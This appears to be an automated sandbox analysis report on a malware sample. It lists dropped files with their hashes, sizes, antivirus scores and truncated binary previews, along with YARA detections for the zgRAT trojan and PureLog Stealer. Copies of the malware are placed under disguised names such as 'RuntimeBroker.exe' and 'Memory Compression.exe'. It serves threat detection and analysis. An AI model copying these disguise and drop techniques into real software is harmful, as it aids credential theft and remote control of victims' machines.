                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Chaindriver.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Chaindriver.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...
                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1903066
                                                  Entropy (8bit):7.843059223598419
                                                  Encrypted:false
                                                  SSDEEP:49152:wZB1G8YNMJPPbLWw/tUVjbny/3tPEKOQ0Kzy:+3G/MJLLWoAq/d7Ty
                                                  MD5:9E935AF26F27628601A2A336CA24AEF2
                                                  SHA1:73BD448A3F95D4A336041318ED3F73726969A4F5
                                                  SHA-256:53C231889339553E8AE274D538AB6EE9BCB471D63B1814FB1078FA475DBE82A2
                                                  SHA-512:BEBD10C43C6FD06406C4998307C6CFFED7AF23285670C8121F09E87719FA5CC5F0ED2C5CBA0DE273FD21867C9BC44F63E42186F62B61CB9C7E8D861D878B8787
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 18%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...{S.e.........."....!.h...j......`..........@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text....f.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with very long lines (318), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):318
                                                  Entropy (8bit):5.7853613236563355
                                                  Encrypted:false
                                                  SSDEEP:6:zScL+3MTSjP9g0IzVNs7EAb1xq3NENhPbu6WUr9cn:++TSjP9g0EswAbWduu6Tr9c
                                                  MD5:7C3C13820EE4D6FAD1DC95433C5AE693
                                                  SHA1:C0EB9224133F7D621487031C4F55D3F23A761D6B
                                                  SHA-256:4957601E3136F6AECDD8A8B7034B755D3D338EDACD0D3E01E67A32B26BD0D8B1
                                                  SHA-512:C1395E52D06A3CBA595E9E6A19D6E76FAA7BBA20FE6DA0A688378FFA308E3349753B5F750B143DC97BE2B3F042BD8ACD32A02EB8965DC820B2438CBFE4374CA6
                                                  Malicious:false
                                                  Preview:2tYtpSoowlwfYd46U21OiqZ1RjQvtTg2TPo0XWvytf3qboh3ZJSofxuLTgcFB24dE3MIzEi7GCeCxtanCXWkA2Xffcg14qw0lZlhbZDVkUhcSrYkGyDofUcMgqmXhrDaQobXH2LmTB9qU5NxE6vFnIUR7YBvwqx3RGMoPAdNmaUeUw2ldySl57xHTKas1a0nNGZNsihDcicMx06LgZR7XM7TTEVFkuVMkqRNXo25QPIXekTdNOLbI2PBIF4oNccsMQmHjty2hWrIEkytv11Vj3DraPFRtNrywaLO7M4eaS4wLH7iQL3VkGJTM4qTng
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with very long lines (873), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):873
                                                  Entropy (8bit):5.901154444640347
                                                  Encrypted:false
                                                  SSDEEP:24:ppL7Icx8zi+HYB9jH7LSO49S+wvADzci/CcuCMRZTq:ppocx0vujbT9+X/fHSZTq
                                                  MD5:7D1374C3F857B4DC7FB8D4CFF72B09D0
                                                  SHA1:1A37DF299BF5D3BBDB09F4F242220B42300D5AD5
                                                  SHA-256:AA60C9D05D3AFB1C74AA2665FD8A8BD430E9CCB4E3E2495DAC39819B390A7E8C
                                                  SHA-512:165B39CFAE6BE6DE2319DFA83F2756EE73DA3E9D4E430842071275797C13B810EBCAFE5F25F277D45389AC49ECDF6DF228DE467891263AE5FC43F4D3BFAC29AA
                                                  Malicious:false
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with very long lines (587), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):587
                                                  Entropy (8bit):5.8862628413604
                                                  Encrypted:false
                                                  SSDEEP:12:xYqlO8KfubtfJ47WrhLDp5OwkTnMM8Ec97dsY/PfHkRu+HMb565h+:xllvKg4aXp5OLT9lM68Hk2b53
                                                  MD5:26F3EED3F2AD0836EB0F2BAAC1AEB009
                                                  SHA1:E31F4422223C1187355E0E9EBC0055085D07A090
                                                  SHA-256:148D29D81B6CC00C786FC46FF821A58FA8DAEF3B2961896A19F29962703CDDF5
                                                  SHA-512:C137A52504685C3DF10F73FEC2BCCB00025DEE4F498C1DC3F737E745E1C2E4DA56F0866D4C4818299D1F42269F9F5AC71E0DA2F2B427962C272DBCF1D0916869
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Pictures\RuntimeBroker.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Pictures\RuntimeBroker.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with very long lines (322), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):322
                                                  Entropy (8bit):5.801479789505418
                                                  Encrypted:false
                                                  SSDEEP:6:W1t1NS9Py/DdvPCLvyhTcTqhDcBLaWeH3Nz8nu1ilKtHKkf9IRWLcn:W1/NS0/DdiT04TqhD4aWSd4u1iUqTR/n
                                                  MD5:442524B80F5B78B00AE69A07E3DA8E5B
                                                  SHA1:2BBB2C49EF0697482117572DE97D3DF81A3B5E90
                                                  SHA-256:6F48B28CBC69A6CB8A3716D4F3EF38785E17593A8500C8A3DE803B77B055DF6F
                                                  SHA-512:CFEF70647EDE81CB5FC08C0201CE32A26875C715D75B779C2925B4D2E3D8213ABA63410DC3BD01843FAC355693EAD5864B6F2DEA3F27950D40B651B4014F6516
                                                  Malicious:false
                                                  Preview:xaYJamAasaAJ4ISTAYtYK0NdhcL14MXS3lC8SbH7TIqB6O6Ahc6hyTI6N5m7bJggDsPTGUBiRwECKLhSfKTcP0dkcFuXzJgKmJ8N8n4NaYPBOGwCYTcQzDRNOo0AjnsIQ3ZANTU2PGB0kbWVTs9gqPVi2v9Uw4owpHvUrvzE9kBtCamwSeq1oMbBi0IcT9FVbOLcqBoi34gGNlfbINCRNwIcqtv0mWv9eqRyPKFQ0I8uqUx6UrUG7xHpGsw7Qy5gJgmhUrL7HwbFyXwV6yf5CoCrimrhXIACMblJsPmmfW8KVB0s5aAbSAded48sAok8wZ
                                                  Process:C:\Chaindriver.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1396
                                                  Entropy (8bit):5.350961817021757
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1613
                                                  Entropy (8bit):5.370675888495854
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
                                                  MD5:5ACBB013936118762389287938AE0885
                                                  SHA1:12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
                                                  SHA-256:28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
                                                  SHA-512:E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                  Process:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):847
                                                  Entropy (8bit):5.354334472896228
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                  Process:C:\Recovery\Memory Compression.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.103465189601646
                                                  Encrypted:false
                                                  SSDEEP:3:+efJFVTX:++TX
                                                  MD5:67F6B0A831C3211FC370A244DBD38C38
                                                  SHA1:F0FE2E1FCA5186928111C0A123A6720366B3C55D
                                                  SHA-256:DC45D6B2F7B7D5F3B289E46096711CC60777C2E1867B511E2A69DD844909D372
                                                  SHA-512:8E56FD19C70506E1360C714F63E27C055E20B87FB15C626557DDF93CB4E9B2E9256E77BAB08C9713C8D355BAD4E19BB69CB78B3027D8942277B568CECDE14219
                                                  Malicious:false
                                                  Preview:PBCBkTzgbEvPABfc23bf7HFPr
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Thu Jan 2 08:09:23 2025, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1932
                                                  Entropy (8bit):4.533414842309649
                                                  Encrypted:false
                                                  SSDEEP:24:Hk29uXOXJTRoFDfH1wKpWN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+IlUZ:VXdRoZ2KwKluOulajfqXSfbNtmhI2Z
                                                  MD5:F0ADE884D3297CCAE34B4D6E80543E1A
                                                  SHA1:962E878B4A0502DBDC754B357CCD4E28D44CC999
                                                  SHA-256:75D3EAC4FB3FCB3BC6045B386590A89BAE3B2404566D4BEBD352B82F41D63E2E
                                                  SHA-512:58A2B3C412DE67278DC579752E240646D7AC06C723AFD21068F66DEEC06379D58F3F5C8E29FB00D1DD42FE17A9E1B12E30D45CAFCA19E9CCBA04A84063DC0EF8
                                                  Malicious:false
                                                  Preview:L....Ivg.............debug$S........$...................@..B.rsrc$01................P...........@..@.rsrc$02........p...d...............@..@........<....c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES953C.tmp.-.<....................a..Microsoft (R) CVTRES.K.=..cwd.C:\.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2117940
                                                  Entropy (8bit):7.868424477636117
                                                  Encrypted:false
                                                  SSDEEP:49152:wZB1G8YjefBxKeUWwRHYv85Yoo3fGafaf0MgPzyFK:+3GwJx2xtQhaf0HyFK
                                                  MD5:B0A28FF93B030B10FD70698A5A7C27D0
                                                  SHA1:1A4BB1BDE02AF64D651E774C811282285B5C8063
                                                  SHA-256:CB3AF34EBD6827F396DE4A91329C45EC6ED5C623B004D2D932213C1E622A07D5
                                                  SHA-512:5172B92531979B6F328668978A8074E8724FFB62A599CE29394B09DD104ACF607B374CBCD2EA152642FAB5DE26D3EC924B63C4E37D1D1CA8042C288895C3F31B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 57%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...{S.e.........."....!.h...j......`..........@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text....f.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):96120
                                                  Entropy (8bit):6.440691568981583
                                                  Encrypted:false
                                                  SSDEEP:1536:dkb0wrlWxdV4tyfa/PUFSAM/HQUucN2f0MFOqH+F3fecbTUEuvw:dWD4eUp+HQpcNg0MFnH+F3fecbTUED
                                                  MD5:4A365FFDBDE27954E768358F4A4CE82E
                                                  SHA1:A1B31102EEE1D2A4ED1290DA2038B7B9F6A104A3
                                                  SHA-256:6A0850419432735A98E56857D5CFCE97E9D58A947A9863CA6AFADD1C7BCAB27C
                                                  SHA-512:54E4B6287C4D5A165509047262873085F50953AF63CA0DCB7649C22ABA5B439AB117A7E0D6E7F0A3E51A23E28A255FFD1CA1DDCE4B2EA7F87BCA1C9B0DBE2722
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~.[...[...[.......Y...R...P...[...w.......V.......K.......D.......Z......Z.......Z...Rich[...................PE..d....R^`.........." .........^......`.....................................................`A.........................................A..4....I...............`..L....T..x#..........H,..T............................,..8............................................text............................... ..`.rdata...?.......@..................@..@.data...@....P.......<..............@....pdata..L....`.......@..............@..@_RDATA.......p.......L..............@..@.rsrc................N..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):86704
                                                  Entropy (8bit):6.416293565012624
                                                  Encrypted:false
                                                  SSDEEP:1536:5XZb8z78wjtQYeO9vDTwE0UaDnV8AQ6HiI37mZIyMVm/yH:5pAzjXeovDsE0UaDnaAQ6HiI3SZIyMVT
                                                  MD5:E91B4F8E1592DA26BACACEB542A220A8
                                                  SHA1:5459D4C2147FA6DB75211C3EC6166B869738BD38
                                                  SHA-256:20895FA331712701EBFDBB9AB87E394309E910F1D782929FD65B59ED76D9C90F
                                                  SHA-512:CB797FA758C65358E5B0FEF739181F6B39E0629758A6F8D5C4BD7DC6422001769A19DF0C746724FB2567A58708B18BBD098327BFBDF3378426049B113EB848E9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[..>...m...m...m...m...ms..l...my.cm...ms..l...ms..l...ms..l...m..l...mD..l...m...m...m..l...m..l...m.am...m..l...mRich...m........PE..d...=3.`.........." .........f.......................................................^....`.........................................`&..H....&.......`.......P..4....6.......p...... ...T...............................8...............@............................text............................... ..`.rdata...B.......D..................@..@.data........@......................@....pdata..4....P....... ..............@..@.rsrc........`.......*..............@..@.reloc.......p.......4..............@..B........................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\t8F7Ic986c.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):271024
                                                  Entropy (8bit):6.526193734528701
                                                  Encrypted:false
                                                  SSDEEP:6144:1y+R2gXaCSVl9yYWDKsSaHlbVTimGDIrfp/AQx9qWMa3pLW1Aqe36bMNrCb:fXaCSr9kDjv//0OnDrCb
                                                  MD5:65287FD87A64BC756867A1AFDDEC9E29
                                                  SHA1:CDA1DB353F81DF7A4A818ADD8F87BCA9AC840455
                                                  SHA-256:DF19C2E6EC3145166FA8D206C11DB78BC1979A027105C4F21D40410B5082BA34
                                                  SHA-512:3E3F19CF965B260FFC68E45D5101234E8A957411C076A0D487D307DCFA714A9801CB501224FE7621937AEBDF90275F655C8A70DD6675BCFB5374404FDA53236F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
